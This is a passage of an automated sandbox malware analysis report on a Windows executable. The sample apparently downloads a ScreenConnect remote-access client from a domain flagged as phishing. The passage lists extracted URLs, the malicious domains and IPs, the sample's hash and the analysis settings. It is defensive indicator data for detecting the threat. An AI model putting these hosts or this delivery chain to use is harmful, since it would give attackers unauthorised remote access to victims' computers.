                                  https://molatoriism.icu/dfsvc.exe, 00000001.00000002.3917244971.0000023571713000.00000004.00000020.00020000.00000000.sdmpfalse
                                  • Avira URL Cloud: phishing
                                  unknown
                                  http://schemas.xmlsoap.org/ws/2005/02/trust/Issue02svchost.exe, 0000000D.00000003.2651783378.000001D224B6D000.00000004.00000020.00020000.00000000.sdmpfalse
                                    high
                                    http://schemas.xmlsoap.org/ws/2005/02/trust/RSTR/Issuesvchost.exe, 0000000D.00000002.3887561203.000001D224B5F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000D.00000003.2651783378.000001D224B6D000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000D.00000003.2630729345.000001D224B6D000.00000004.00000020.00020000.00000000.sdmpfalse
                                      high
                                      https://molatoriism.icu/Bin/ScreenConnect.Client.manifestU0E0MDk2U0hBMzg0MjAyMUNBMS5jcnQwDAYDVR0TAQHdfsvc.exe, 00000001.00000002.3915848532.000002357165D000.00000004.00000020.00020000.00000000.sdmpfalse
                                      • Avira URL Cloud: phishing
                                      unknown
                                      http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-utility-1.0.xsdssvchost.exe, 0000000D.00000003.2631010430.000001D224B74000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000D.00000003.2630729345.000001D224B6D000.00000004.00000020.00020000.00000000.sdmpfalse
                                        high
                                        https://login.microsoftonline.com/ppsecure/EnumerateDevices.srfsvchost.exe, 0000000D.00000003.2502073556.000001D224B4D000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000D.00000002.3886752397.000001D224240000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000D.00000003.2502160772.000001D224B63000.00000004.00000020.00020000.00000000.sdmpfalse
                                          high
                                          https://account.live.com/InlineSignup.aspx?iww=1&id=80502svchost.exe, 0000000D.00000003.2502073556.000001D224B4D000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000D.00000002.3886752397.000001D224240000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000D.00000003.2502160772.000001D224B63000.00000004.00000020.00020000.00000000.sdmpfalse
                                            high
                                            http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namedfsvc.exe, 00000001.00000002.3886946834.000002350001A000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.ClientService.exe, 00000007.00000002.3889817290.0000000001772000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.WindowsClient.exe, 0000000E.00000002.2529707032.00000000024E1000.00000004.00000800.00020000.00000000.sdmpfalse
                                              high
                                              http://Passport.NET/tb_svchost.exe, 0000000D.00000002.3887830173.000001D225232000.00000004.00000020.00020000.00000000.sdmpfalse
                                                high
                                                https://login.microsoftonline.com/ppsecure/DeviceUpdate.srfStsvchost.exe, 0000000D.00000002.3886752397.000001D224240000.00000004.00000020.00020000.00000000.sdmpfalse
                                                  high
                                                  http://schemas.xmlsoap.org/ws/2005/02/trust/RST/Issue0svchost.exe, 0000000D.00000003.2651783378.000001D224B6D000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000D.00000003.2630729345.000001D224B6D000.00000004.00000020.00020000.00000000.sdmpfalse
                                                    high
                                                    http://www.w3.(svchost.exe, 0000000D.00000003.2614693181.000001D225264000.00000004.00000020.00020000.00000000.sdmpfalse
                                                    • Avira URL Cloud: safe
                                                    unknown
                                                    https://molatoriism.icu/Bin/ScreenConnect.Client.application?e=Suppb/dfsvc.exe, 00000001.00000002.3915635495.0000023570D67000.00000004.00000020.00020000.00000000.sdmpfalse
                                                    • Avira URL Cloud: phishing
                                                    unknown
                                                    https://account.live.com/msangcwamsvchost.exe, 0000000D.00000003.2502094568.000001D224B3B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000D.00000003.2502118247.000001D224B57000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000D.00000003.2502139880.000001D224B40000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000D.00000003.2502403168.000001D224B2A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000D.00000002.3886752397.000001D224240000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000D.00000003.2501931391.000001D224B52000.00000004.00000020.00020000.00000000.sdmpfalse
                                                      high
                                                      https://molatoriism.icu/Bin/ScreenConnect.Client.applicationz.dfsvc.exe, 00000001.00000002.3912891196.000002356F465000.00000004.00000020.00020000.00000000.sdmpfalse
                                                      • Avira URL Cloud: phishing
                                                      unknown
                                                      https://molatoriism.icu/Bin/ScreenConnect.Client.applicationdb01RReJz3iq4ScreenConnect.WindowsClient.exe, 00000005.00000002.2472112800.0000000001378000.00000004.00000020.00020000.00000000.sdmpfalse
                                                      • Avira URL Cloud: phishing
                                                      unknown
                                                      http://www.w3.ordfsvc.exe, 00000001.00000002.3886946834.0000023500658000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 00000001.00000002.3886946834.00000235006F0000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 00000001.00000002.3886946834.000002350067B000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 00000001.00000002.3886946834.000002350032E000.00000004.00000800.00020000.00000000.sdmpfalse
                                                        high
                                                        http://crl.ver)svchost.exe, 00000003.00000002.3749275976.00000133B0C00000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000D.00000002.3886798080.000001D2242A3000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000D.00000003.2677267062.000001D2242A3000.00000004.00000020.00020000.00000000.sdmpfalse
                                                          high
                                                          http://passport.net/tbsvchost.exe, 0000000D.00000002.3887830173.000001D225232000.00000004.00000020.00020000.00000000.sdmpfalse
                                                            high
                                                            https://molatoriism.icu/Bin/ScreenConnect.Client.applicationanifestInformatiScreenConnect.WindowsClient.exe, 00000005.00000002.2472112800.0000000001378000.00000004.00000020.00020000.00000000.sdmpfalse
                                                            • Avira URL Cloud: phishing
                                                            unknown
                                                            https://login.microsoftonline.com/ppsecure/DeviceDisassociate.srfsvchost.exe, 0000000D.00000002.3886752397.000001D224240000.00000004.00000020.00020000.00000000.sdmpfalse
                                                              high
                                                              https://molatoriism.icu/Bin/ScreenConnect.WindowsBackstageShell.exe.config(dfsvc.exe, 00000001.00000002.3917764823.00000235717D9000.00000004.00000020.00020000.00000000.sdmpfalse
                                                              • Avira URL Cloud: phishing
                                                              unknown
                                                              http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-secext-1.0.xsdssvchost.exe, 0000000D.00000003.2645030441.000001D224B76000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                high
                                                                https://molatoriism.icu/Bin/ScreenConnect.Client.applicationXScreenConnect.WindowsClient.exe, 00000005.00000002.2472709033.000000000310F000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                • Avira URL Cloud: phishing
                                                                unknown
                                                                https://molatoriism.icu/Bin/ScreenConnect.Client.application_dfsvc.exe, 00000001.00000002.3915848532.00000235716B3000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                • Avira URL Cloud: phishing
                                                                unknown
                                                                https://molatoriism.icu/Bin/ScreenConnect.Client.applicatiopzPO97QouM.exe, 00000000.00000002.3001524787.0000000000C4A000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                • Avira URL Cloud: phishing
                                                                unknown
                                                                http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-utility-1.0.xsdxVsvchost.exe, 0000000D.00000002.3887561203.000001D224B5F000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                  high
                                                                  https://logilive.com/ppsecure/InlineClientsvchost.exe, 0000000D.00000002.3886798080.000001D2242A3000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                  • Avira URL Cloud: safe
                                                                  unknown
                                                                  http://schemas.xmlsoap.org/ws/2005/02/trust/RST/Issuesvchost.exe, 0000000D.00000002.3887186855.000001D2242D4000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000D.00000002.3887561203.000001D224B5F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000D.00000003.2651783378.000001D224B6D000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                    high
                                                                    https://molatoriism.icu/Bin/ScreenConnect.Client.application#ScreenConnect.WindowsClientdfsvc.exe, 00000001.00000002.3917244971.0000023571713000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                    • Avira URL Cloud: phishing
                                                                    unknown
                                                                    http://schemas.xmlsoap.org/ws/2005/02/trust/Issueesvchost.exe, 0000000D.00000003.2630729345.000001D224B6D000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                      high
                                                                      https://molatoriism.icu/Bin/ScreenConnect.Client.applicationsdfsvc.exe, 00000001.00000002.3915848532.00000235716B3000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                      • Avira URL Cloud: phishing
                                                                      unknown
                                                                      https://molatoriism.icu/Bin/ScreenConnect.Client.applicationosoftdfsvc.exe, 00000001.00000002.3915848532.00000235716B3000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                      • Avira URL Cloud: phishing
                                                                      unknown
                                                                      https://molatoriism.icu/Bin/ScreenConnect.WindowsBackstageShell.exe.configFdfsvc.exe, 00000001.00000002.3917764823.00000235717D9000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                      • Avira URL Cloud: phishing
                                                                      unknown
                                                                      http://schemas.xmlsoap.org/ws/2005/02/trustpsvchost.exe, 0000000D.00000002.3887561203.000001D224B5F000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                        high
                                                                        https://molatoriism.icu/Bin/ScreenConnect.WindowsClient.exe.configUdfsvc.exe, 00000001.00000002.3915848532.00000235716B3000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                        • Avira URL Cloud: phishing
                                                                        unknown
                                                                        https://molatoriism.icu/Bin/ScreenConnect.Client.applicationxdfsvc.exe, 00000001.00000002.3886946834.000002350032E000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                          unknown
                                                                          https://molatoriism.icudfsvc.exe, 00000001.00000002.3886946834.000002350001A000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 00000001.00000002.3886946834.000002350075D000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 00000001.00000002.3886946834.000002350040E000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 00000001.00000002.3886946834.000002350046F000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 00000001.00000002.3886946834.00000235004AF000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                          • Avira URL Cloud: phishing
                                                                          unknown
                                                                          https://molatoriism.icu/Bin/ScreenConnect.Client.application#ScreenConnect.WindowsClient.applicationScreenConnect.WindowsClient.exe, 00000005.00000002.2472519815.0000000001774000.00000004.00000020.00020000.00000000.sdmp, ScreenConnect.WindowsClient.exe, 00000005.00000002.2466646633.00000000012B1000.00000004.00000020.00020000.00000000.sdmp, ScreenConnect.WindowsClient.exe, 00000005.00000002.2472709033.0000000003190000.00000004.00000800.00020000.00000000.sdmp, V0C4K20S.log.1.drfalse
                                                                          • Avira URL Cloud: phishing
                                                                          unknown
                                                                          https://molatoriism.icu/Bin/ScreenConnect.WindowsCdfsvc.exe, 00000001.00000002.3886946834.000002350040E000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                          • Avira URL Cloud: phishing
                                                                          unknown
                                                                          https://login.microsoftonline.com/ppsecure/DeviceDisassociate.srf:CLSIDsvchost.exe, 0000000D.00000003.2501894009.000001D224B10000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                            high
                                                                            https://login.microsoftonline.com/ppsecure/deviceremovecredential.srfsvchost.exe, 0000000D.00000003.2501894009.000001D224B10000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                              high
                                                                              https://molatoriism.icu/Bin/ScreenConnect.ClientService.dllA0dfsvc.exe, 00000001.00000002.3912891196.000002356F465000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                              • Avira URL Cloud: phishing
                                                                              unknown
                                                                              https://login.microsoftonline.com/ppsecure/DeviceQuery.srfsvchost.exe, 0000000D.00000003.2502073556.000001D224B4D000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000D.00000002.3886752397.000001D224240000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000D.00000003.2502160772.000001D224B63000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                high
                                                                                http://schemas.xmlsoap.org/soap/envelope/svchost.exe, 0000000D.00000002.3886798080.000001D2242A3000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000D.00000002.3887561203.000001D224B5F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000D.00000003.2677267062.000001D2242A3000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                  high
                                                                                  https://molatoriism.icu/Bin/ScreenConnect.Client.application?e=Support&y=Guest&h=pick09y.top&p=8880&V0C4K20S.log.1.drfalse
                                                                                  • Avira URL Cloud: phishing
                                                                                  unknown
                                                                                  https://molatoriism.icu/Bin/ScreenConnect.Windows.dllkgdfsvc.exe, 00000001.00000002.3917244971.0000023571713000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                  • Avira URL Cloud: phishing
                                                                                  unknown
                                                                                  http://schemas.xmlsoap.org/ws/2005/02/trustsvchost.exe, 0000000D.00000002.3887561203.000001D224B5F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000D.00000003.2677210493.000001D2252C7000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000D.00000002.3887521934.000001D224B37000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                    high
                                                                                    https://login.microsoftonline.com/MSARST2.srfsvchost.exe, 0000000D.00000003.2502094568.000001D224B3B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000D.00000002.3886798080.000001D22425F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000D.00000003.2502139880.000001D224B40000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000D.00000003.2502160772.000001D224B63000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                      high
                                                                                      http://Passport.NET/STSsvchost.exe, 0000000D.00000003.2614528765.000001D224B74000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000D.00000003.2677267062.000001D22427F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000D.00000002.3887561203.000001D224B5F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000D.00000003.2651783378.000001D224B6D000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000D.00000003.2614650893.000001D224B76000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000D.00000002.3886798080.000001D224281000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000D.00000003.2630729345.000001D224B6D000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000D.00000002.3887521934.000001D224B37000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                        high
                                                                                        http://docs.oasis-open.org/wss/2svchost.exe, 0000000D.00000002.3887561203.000001D224B5F000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                          high
                                                                                          https://molatoriism.icu/Bin/ScreenConnect.WindowsFileManager.exetdfsvc.exe, 00000001.00000002.3915848532.00000235716B3000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                          • Avira URL Cloud: phishing
                                                                                          unknown
                                                                                          http://www.xrml.org/schema/2001/11/xrml2coreSdfsvc.exe, 00000001.00000002.3886946834.0000023500089000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                            high
                                                                                            http://Passport.8svchost.exe, 0000000D.00000003.2630973958.000001D224B79000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000D.00000003.2630729345.000001D224B6D000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                            • Avira URL Cloud: safe
                                                                                            unknown
                                                                                            http://www.w3.odfsvc.exe, 00000001.00000002.3886946834.0000023500658000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 00000001.00000002.3886946834.000002350061D000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 0000000D.00000002.3887186855.000001D224302000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                              high
                                                                                              http://Passport.NET/tbsvchost.exe, 0000000D.00000002.3888112715.000001D22526A000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                high
                                                                                                https://molatoriism.icu/Bin/ScreenConnect.Client.applications_e089ScreenConnect.WindowsClient.exe, 00000005.00000002.2472112800.0000000001378000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                • Avira URL Cloud: phishing
                                                                                                unknown
                                                                                                http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-utility-1.0.xsdsvchost.exe, 0000000D.00000002.3887561203.000001D224B5F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000D.00000003.2519973205.000001D224B29000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000D.00000003.2630990946.000001D224B77000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000D.00000003.2614650893.000001D224B76000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000D.00000003.2630729345.000001D224B6D000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000D.00000003.2677210493.000001D2252C7000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                  high
                                                                                                  https://molatoriism.icu/Bin/ScreenConnect.Client.applicationIEluYy4xQTA/BgNVScreenConnect.WindowsClient.exe, 00000005.00000002.2472112800.0000000001378000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                  • Avira URL Cloud: phishing
                                                                                                  unknown
                                                                                                  http://Passport.NET/STS09/xmldsig#ripledes-cbcices/SOAPFaultcurity-utility-1.0.xsdsvchost.exe, 0000000D.00000003.2630729345.000001D224B6D000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                    high
                                                                                                    https://molatoriism.icu/Bin/ScreenConnect.Client.application#ScreenConnedfsvc.exe, 00000001.00000002.3917244971.0000023571713000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                    • Avira URL Cloud: phishing
                                                                                                    unknown
                                                                                                    https://signup.live.com/signup.aspxsvchost.exe, 0000000D.00000003.2502094568.000001D224B3B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000D.00000003.2501931391.000001D224B55000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000D.00000003.2502139880.000001D224B40000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000D.00000003.2502403168.000001D224B2A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000D.00000003.2502073556.000001D224B4D000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000D.00000002.3886752397.000001D224240000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                      high
                                                                                                      https://molatoriism.icu/Bin/ScreenConnect.Windows.dllddfsvc.exe, 00000001.00000002.3909247631.000002356D1C1000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                      • Avira URL Cloud: phishing
                                                                                                      unknown
                                                                                                      https://account.live.com/inlinesignup.aspx?iww=1&id=80601svchost.exe, 0000000D.00000003.2502328594.000001D224B56000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000D.00000003.2501931391.000001D224B52000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                        high
                                                                                                        https://account.live.com/inlinesignup.aspx?iww=1&id=80603svchost.exe, 0000000D.00000003.2502328594.000001D224B56000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000D.00000003.2501931391.000001D224B52000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                          high
                                                                                                          https://molatoriism.icu/Bin/ScreenConnect.ClientSedfsvc.exe, 00000001.00000002.3886946834.000002350075D000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                          • Avira URL Cloud: phishing
                                                                                                          unknown
                                                                                                          http://schemas.xmlsoap.org/ws/2004/09/policysvchost.exe, 0000000D.00000002.3887410161.000001D224B00000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000D.00000002.3887561203.000001D224B5F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000D.00000003.2651783378.000001D224B6D000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000D.00000003.2630729345.000001D224B6D000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000D.00000003.2677210493.000001D2252C7000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000D.00000002.3887521934.000001D224B37000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                            high
                                                                                                            http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymoussvchost.exe, 0000000D.00000002.3887521934.000001D224B37000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                              high
                                                                                                              http://www.xrml.org/schema/2001/11/xrml2coredfsvc.exe, 00000001.00000002.3886946834.0000023500089000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                high
                                                                                                                https://account.live.com/inlinesignup.aspx?iww=1&id=80605svchost.exe, 0000000D.00000003.2502403168.000001D224B2A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000D.00000003.2502328594.000001D224B56000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000D.00000003.2501931391.000001D224B52000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                  high
                                                                                                                  https://account.live.com/inlinesignup.aspx?iww=1&id=80604svchost.exe, 0000000D.00000003.2502328594.000001D224B56000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000D.00000003.2501931391.000001D224B52000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                    high
                                                                                                                    https://login.microsoftonline.com/ppsecure/deviceaddmsacredential.srfsvchost.exe, 0000000D.00000002.3886752397.000001D224240000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000D.00000003.2501894009.000001D224B10000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                      high
                                                                                                                      https://login.microsoftonline.com/ppsecure/devicechangecredential.srfTokensvchost.exe, 0000000D.00000002.3886752397.000001D224240000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                        high
                                                                                                                        http://upx.sf.netAmcache.hve.12.drfalse
                                                                                                                          high
                                                                                                                          http://ocsp.digicert.codfsvc.exe, 00000001.00000002.3886946834.000002350024F000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                            high
                                                                                                                            http://schemas.xmlsoap.org/ws/2005/02/trust/Issuesvchost.exe, 0000000D.00000002.3888112715.000001D22526A000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                              high
                                                                                                                              https://molatoriism.icu/Bin/ScreenConnect.WindowsClient.exendfsvc.exe, 00000001.00000002.3917764823.00000235717D9000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                              • Avira URL Cloud: phishing
                                                                                                                              unknown
                                                                                                                              https://g.live.com/odclientsettings/Prod/C:edb.log.3.drfalse
                                                                                                                                high
                                                                                                                                https://login.microsoftonline.com/ppsecure/DeviceAssociate.srfsvchost.exe, 0000000D.00000003.2502073556.000001D224B4D000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000D.00000002.3886752397.000001D224240000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000D.00000003.2502160772.000001D224B63000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                  high
                                                                                                                                  https://account.live.com/Wizard/Password/Change?id=80601svchost.exe, 0000000D.00000002.3886798080.000001D22425F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000D.00000003.2502073556.000001D224B4D000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000D.00000003.2502328594.000001D224B56000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000D.00000003.2502160772.000001D224B63000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000D.00000003.2501931391.000001D224B52000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                    high
                                                                                                                                    http://schemas.xmlsoap.org/ws/2005/02/scsvchost.exe, 0000000D.00000002.3887561203.000001D224B5F000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                      high
                                                                                                                                      https://account.live.com/inlinesignup.aspx?iww=1&id=80601svchost.exe, 0000000D.00000002.3886798080.000001D22425F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000D.00000003.2502073556.000001D224B4D000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000D.00000003.2502160772.000001D224B63000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                        high
                                                                                                                                        • No. of IPs < 25%
                                                                                                                                        • 25% < No. of IPs < 50%
                                                                                                                                        • 50% < No. of IPs < 75%
                                                                                                                                        • 75% < No. of IPs
                                                                                                                                        IPDomainCountryFlagASNASN NameMalicious
                                                                                                                                        172.67.182.214
                                                                                                                                        molatoriism.icuUnited States
                                                                                                                                        13335CLOUDFLARENETUSfalse
                                                                                                                                        62.182.85.100
                                                                                                                                        pick09y.topUkraine
                                                                                                                                        205172YANINA-ASUAfalse
                                                                                                                                        IP
                                                                                                                                        127.0.0.1
                                                                                                                                        Joe Sandbox version:41.0.0 Charoite
                                                                                                                                        Analysis ID:1551436
                                                                                                                                        Start date and time:2024-11-07 18:03:21 +01:00
                                                                                                                                        Joe Sandbox product:CloudBasic
                                                                                                                                        Overall analysis duration:0h 8m 48s
                                                                                                                                        Hypervisor based Inspection enabled:false
                                                                                                                                        Report type:full
                                                                                                                                        Cookbook file name:default.jbs
                                                                                                                                        Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                                                                                        Run name:Run with higher sleep bypass
                                                                                                                                        Number of analysed new started processes analysed:15
                                                                                                                                        Number of new started drivers analysed:0
                                                                                                                                        Number of existing processes analysed:0
                                                                                                                                        Number of existing drivers analysed:0
                                                                                                                                        Number of injected processes analysed:0
                                                                                                                                        Technologies:
                                                                                                                                        • HCA enabled
                                                                                                                                        • EGA enabled
                                                                                                                                        • AMSI enabled
                                                                                                                                        Analysis Mode:default
                                                                                                                                        Analysis stop reason:Timeout
                                                                                                                                        Sample name:pzPO97QouM.exe
                                                                                                                                        renamed because original name is a hash value
                                                                                                                                        Original Sample Name:fe9cb4c7eaa00078639484c209a3acf1d5195cbec55bd7981e733fb179bea899.exe
                                                                                                                                        Detection:MAL
                                                                                                                                        Classification:mal60.evad.winEXE@20/78@2/3
                                                                                                                                        EGA Information:
                                                                                                                                        • Successful, ratio: 85.7%
                                                                                                                                        HCA Information:
                                                                                                                                        • Successful, ratio: 67%
                                                                                                                                        • Number of executed functions: 249
                                                                                                                                        • Number of non-executed functions: 26
                                                                                                                                        Cookbook Comments:
                                                                                                                                        • Found application associated with file extension: .exe
                                                                                                                                        • Sleeps bigger than 100000000ms are automatically reduced to 1000ms
                                                                                                                                        • Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe
                                                                                                                                        • Excluded IPs from analysis (whitelisted): 93.184.221.240, 192.229.221.95, 184.28.90.27, 20.190.159.4, 20.190.159.68, 20.190.159.71, 40.126.31.71, 40.126.31.67, 40.126.31.69, 20.190.159.23, 20.190.159.0, 20.189.173.22
                                                                                                                                        • Excluded domains from analysis (whitelisted): slscr.update.microsoft.com, onedsblobprdwus17.westus.cloudapp.azure.com, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, wu.azureedge.net, ocsp.digicert.com, login.live.com, e16604.g.akamaiedge.net, bg.apr-52dd2-0503.edgecastdns.net, cs11.wpc.v0cdn.net, ocsp.edge.digicert.com, hlb.apr-52dd2-0.edgecastdns.net, prod.fs.microsoft.com.akadns.net, wu-b-net.trafficmanager.net, prdv4a.aadg.msidentity.com, fs.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com.delivery.microsoft.com, wu.ec.azureedge.net, www.tm.v4.a.prd.aadg.akadns.net, cacerts.digicert.com, ctldl.windowsupdate.com, login.msa.msidentity.com, fe3cr.delivery.mp.microsoft.com, blobcollector.events.data.trafficmanager.net, umwatson.events.data.microsoft.com, www.tm.lg.prod.aadmsa.trafficmanager.net
                                                                                                                                        • Execution Graph export aborted for target ScreenConnect.ClientService.exe, PID 3652 because it is empty
                                                                                                                                        • Report size exceeded maximum capacity and may have missing behavior information.
                                                                                                                                        • Report size getting too big, too many NtAllocateVirtualMemory calls found.
                                                                                                                                        • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                                                                                        • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                                                                                                        • Report size getting too big, too many NtQueryValueKey calls found.
                                                                                                                                        • Report size getting too big, too many NtReadVirtualMemory calls found.
                                                                                                                                        • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                                                                                                        • VT rate limit hit for: pzPO97QouM.exe
                                                                                                                                        TimeTypeDescription
                                                                                                                                        12:04:46API Interceptor4424740x Sleep call for process: dfsvc.exe modified
                                                                                                                                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                        172.67.182.214http://molatoriism.icuGet hashmaliciousHTMLPhisherBrowse
                                                                                                                                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                          molatoriism.icuhttp://molatoriism.icuGet hashmaliciousHTMLPhisherBrowse
                                                                                                                                          • 104.21.96.148
